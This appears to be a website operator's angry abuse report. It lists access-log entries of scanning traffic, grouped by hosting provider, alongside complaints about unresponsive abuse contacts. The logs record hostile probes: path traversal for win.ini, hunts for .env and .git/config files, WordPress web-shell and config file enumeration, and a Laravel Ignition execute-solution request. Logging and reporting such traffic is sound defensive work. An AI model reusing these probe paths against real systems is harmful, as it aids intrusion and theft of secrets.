lir@di-net.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS COMPLETE UNWANTED AND COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
2a00:1c48:8:224::1 website*x.com – – [20/Sep/2025:13:32:52 +0200] „GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.0“ 302 – „-“ „-“
2a00:1c48:8:224::1 website*x.com – – [20/Sep/2025:13:32:54 +0200] „POST /goform/setSysAdm HTTP/1.0“ 302 – „website*x.com/login.shtml“ „Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0“
… and so on… and so on… – VERY UNSECURE PROVIDER!!!
+
85.192.18.102 website*x.com – – [20/Sep/2025:13:32:54 +0200] „POST /account HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (ZZ; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0“
85.192.18.102 website*x.com – – [20/Sep/2025:13:32:54 +0200] „POST /user.action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/113.0 Safari/537.36“
… and so on… and so on… – VERY UNSECURE PROVIDER!!!

MAIL NR. 4 – Hacker-Idiots from SATURDAY!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,ip.abuse@ril.com,

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
135.225.85.23 website*x.de – – [20/Sep/2025:04:02:58 +0200] „GET /abcd.php HTTP/1.0“ 302 – „-“ „-“
+
40.122.164.78 website*x.de – – [20/Sep/2025:06:50:05 +0200] „GET /.well-known/admin.php HTTP/1.0“ 403 – „-“ „-“
40.122.164.78 website*x.de – – [20/Sep/2025:06:50:05 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“

AS55836 – Reliance Jio Infocomm Limited – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip.abuse@ril.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
THIS IS NO GOOGLE-BOT!!! – Here are we have a 403 but when it´s a 200, this idiots start to try to hacking!!!
2405:201:a004:a826:a409:8db6:5afb:580d website*x.de – – [20/Sep/2025:10:55:38 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)“
2405:201:a004:a826:a409:8db6:5afb:580d website*x.de – – [20/Sep/2025:10:55:39 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“

MAIL NR. 5 – Hacker-Idiots from SATURDAY!

qcloud_net_duty@tencent.com, tencent_idc@tencent.com, optout@internet-census.org, noc@internet-webhosting.com

AS211680 – NSEC – Sistemas Informaticos, S.A. – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
optout@internet-census.org – VERY ARROGANT AND IGNORANT IN OUR ABUSE EMAILS!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
45.156.129.122 www.website*x.com – – [20/Sep/2025:09:48:04 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36“

AS132203 – Tencent Building, Kejizhongyi Avenue – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
170.106.161.78 www.website*x.com – – [20/Sep/2025:11:49:01 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

AS132241 – SKSA TECHNOLOGY SDN BHD – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@internet-webhosting.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.8.27.27 website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /crm/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /crm/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
103.8.27.27 www.website*x.com – – [20/Sep/2025:13:13:11 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“

MAIL NR. 6 – Hacker-Idiots from SATURDAY!

info@traffictransitsolution.us,google-cloud-compliance@google.com, network-abuse@google.com,abuse@as210558.net,abuse@zohocorp.com

AS26548 – PureVoltage Hosting Inc. – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@traffictransitsolution.us – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.10.167.19 website*x.com – – [20/Sep/2025:10:42:13 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
HERE WE HAVE A SEARCH FOR UNSECURE .JS-FILES! WE HAVE REPORT THIS SO MANY TIMES BUT THIS IGNORANT PROVIDER DOES NOTHING!!!
35.192.58.240 website*x.com – – [20/Sep/2025:18:51:17 +0200] „GET /media/system/js/core.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
35.192.58.240 website*x.com – – [20/Sep/2025:18:51:18 +0200] „GET /wp-includes/js/jquery/jquery.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“

AS210558 – 1337 Services GmbH – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@as210558.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
DAILY REFERRER-SPAM S H I T TO THE DUBIOUS WEBSITE BINANCE.COM!!!
2.58.56.66 website*x.com – – [20/Sep/2025:21:30:58 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS2639 – ZOHO – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@zohocorp.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
HERE ARE WE HAVE A 403 BUT WHEN IT´S A 200, THIS HACKER-IDIOTS START TO TRY TO HACKING!!!
8.39.54.150 www.website*x.com – – [20/Sep/2025:23:00:31 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
8.39.54.150 website*x.com – – [20/Sep/2025:23:00:31 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
8.39.54.150 www.website*x.com – – [20/Sep/2025:23:00:31 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“
8.39.54.150 website*x.com – – [20/Sep/2025:23:00:32 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36“

MAIL NR. 7 – Hacker-Idiots from SATURDAY!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,dmzhostabuse@gmail.com

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
DAILY REFERRER-SPAM S H I T TO THE DUBIOUS WEBSITE BINANCE.COM!!!
62.169.20.151 website*x.com – – [20/Sep/2025:13:46:39 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
135.225.112.207 website*x.com – – [20/Sep/2025:14:02:19 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
+
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:49 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:49 +0200] „GET /wp-trackback.php?d= HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:54 +0200] „GET /wp-activate.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:55 +0200] „GET /wp-blog-header.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:57 +0200] „GET /wp-comments-post.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:58 +0200] „GET /wp-config-sample.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:09:59 +0200] „GET /wp-config.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:01 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:02 +0200] „GET /wp-links-opml.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:03 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:04 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:05 +0200] „GET /wp-mail.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:06 +0200] „GET /wp-settings.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:08 +0200] „GET /wp-signup.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:09 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:10 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „-“
20.41.73.214 website*x.com – – [20/Sep/2025:15:10:10 +0200] „GET /saiga.php HTTP/1.0“ 302 – „-“ „-“

AS48090 – TECHOFF SRV LIMITED – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
dmzhostabuse@gmail.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.148.10.140 website*x.com – – [20/Sep/2025:14:06:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
45.148.10.140 website*x.com – – [20/Sep/2025:14:06:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“

MAIL NR. 8 – Hacker-Idiots from SATURDAY!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,qcloud_net_duty@tencent.com, tencent_idc@tencent.com,

AS141995 – Contabo Asia Private Limited – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
194.233.82.231 www.website*x.com – – [20/Sep/2025:15:35:42 +0200] „HEAD /_ignition/execute-solution HTTP/1.0“ 403 – „https://gbnadvisors.com/_ignition/execute-solution“ „Go-http-client/2.0“
194.233.82.231 www.website*x.com – – [20/Sep/2025:15:35:42 +0200] „GET /_ignition/execute-solution HTTP/1.0“ 403 – „https://gbnadvisors.com/_ignition/execute-solution“ „Go-http-client/2.0“

AS45090 – Shenzhen Tencent Computer Systems Company Limited – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – VERY ARROGANT AND IGNORANT IN OUR ABUSE EMAILS! – ABUSE PER EMAIL IS STANDARD!!!
DAILY REFERRER-SPAM S H I T TO THE UNWANTED WEBSITE gbnadvisors.com!!!
CHINA IS COMPLETE UNWANTED AND ALSO COMPLETE BLOCKED! – TO MANY REFERRER-SPAM AND/OR HACKER-IDIOTS EVERY DAY!!!
162.14.197.180 www.website*x.com – – [20/Sep/2025:17:21:00 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

MAIL NR. 9 – Hacker-Idiots from SATURDAY!

abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse-reports@cloudzy.com,abuse-reports@vpnconsumer.com

AS8075 – Microsoft Corporation – HERE WITH 2 IP´S!!! – AGAIN AND AGAIN EVERY DAY! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:16 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:16 +0200] „GET /wp-trackback.php?d= HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:22 +0200] „GET /wp-activate.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:24 +0200] „GET /wp-blog-header.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:27 +0200] „GET /wp-comments-post.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:28 +0200] „GET /wp-config-sample.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:29 +0200] „GET /wp-config.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:31 +0200] „GET /wp-cron.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:33 +0200] „GET /wp-links-opml.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:34 +0200] „GET /wp-load.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:35 +0200] „GET /wp-mail.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:37 +0200] „GET /wp-settings.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:38 +0200] „GET /wp-signup.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:39 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:41 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „-“
20.41.72.233 website*x.com – – [20/Sep/2025:17:40:41 +0200] „GET /saiga.php HTTP/1.0“ 302 – „-“ „-“

AS14956 – RouterHosting LLC – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-reports@cloudzy.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:17:58:48 +0200] „GET /wp-admin/network/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:17:59:20 +0200] „GET /wp-admin/js/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:17:59:51 +0200] „GET /wp-admin/images/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:00:57 +0200] „GET /wp-admin/css/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:01:40 +0200] „GET /wp-includes/SimplePie/Content/Type/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:01:45 +0200] „GET /wp-includes/Requests/Auth/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:01:58 +0200] „GET /wp-admin/css/colors/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:02:44 +0200] „GET /wp-content/languages/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:05 +0200] „GET /wp-content/upgrade/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:15 +0200] „GET /wp-content/IXR/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:46 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:50 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:51 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:53 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:55 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2602:fa59:9:e3a::1 website*x.com – – [20/Sep/2025:18:03:57 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS206092 – Internet Utilities Europe and Asia Limited – HERE WITH 8 IP´S!!! – VERY UNWANTED AND UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse-reports@vpnconsumer.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /manager.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /O-Simple.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /zwso.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
45.86.200.38 website*x.com – – [20/Sep/2025:23:32:16 +0200] „GET /.well-known/login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
… and so on… and so on… VERY IGNORANT AND VERY UNSECURE PROVIDER!!!
+
45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /wp-includes/assets/info.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /wp-includes/class.api.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
45.86.200.2 website*x.com – – [20/Sep/2025:23:32:18 +0200] „GET /wp-includes/fonts/index.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
